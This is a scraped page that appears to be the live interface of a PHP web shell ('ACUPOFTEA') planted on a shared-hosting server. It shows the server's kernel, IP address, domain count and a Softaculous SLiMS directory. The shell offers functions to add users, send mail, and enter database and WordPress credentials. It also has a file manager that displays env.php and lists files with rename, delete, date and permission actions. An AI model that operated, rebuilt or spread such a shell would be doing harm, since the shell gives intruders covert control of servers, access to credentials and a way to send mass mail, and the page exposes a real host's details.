System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
slims
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
env.php
<?php /** * Supported mode list: * - development : all errors will appear * - production : silent error */ $env = 'production'; /** * Environment mode if * incoming ip has registered at * $ip_range and $based_on_ip = true */ $conditional_environment = 'production'; /** * Show error only for some ip * based on ip range */ $based_on_ip = false; /** * Range IP will be impacted with * environment mode */ $range_ip = ['']; if ($based_on_ip) { // For load balancing or Reverse Proxy if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) && in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $range_ip)) { $env = $conditional_environment; } else if (in_array($_SERVER['REMOTE_ADDR']??'', $range_ip)) { $env = $conditional_environment; } } /** * Cli environment */ if (php_sapi_name() === 'cli') { $env = $conditional_environment !== $env ? $conditional_environment : $env; }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
php53
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
php56
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
php71
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
php81
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
php82
DIR
-
drwxr-xr-x
2025-09-20 09:39:34
changelog.txt
text/plain
5.87 KB
-rw-r--r--
2025-09-19 07:23:40
clone.php
text/x-php
5.07 KB
-rw-r--r--
2025-09-19 07:51:20
database.php
text/x-php
916 B
-rw-r--r--
2025-08-29 03:57:50
edit.php
text/x-php
4.25 KB
-rw-r--r--
2025-09-19 07:51:20
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
env.php
text/x-php
921 B
-rw-r--r--
2025-08-29 03:57:50
extend.php
text/x-php
8.78 KB
-rw-r--r--
2025-09-19 07:51:20
fileindex.php
text/plain
393 B
-rw-r--r--
2025-08-29 03:57:50
import.php
text/x-php
3.74 KB
-rw-r--r--
2025-09-19 07:51:20
info.xml
text/html
3.74 KB
-rw-r--r--
2025-09-19 07:23:40
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
4.82 KB
-rw-r--r--
2025-09-19 07:51:20
install.xml
text/html
1.38 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
1.51 KB
-rw-r--r--
2025-09-19 07:51:20
notes.txt
text/plain
480 B
-rw-r--r--
2023-06-02 04:49:28
update_pass.php
text/x-php
257 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com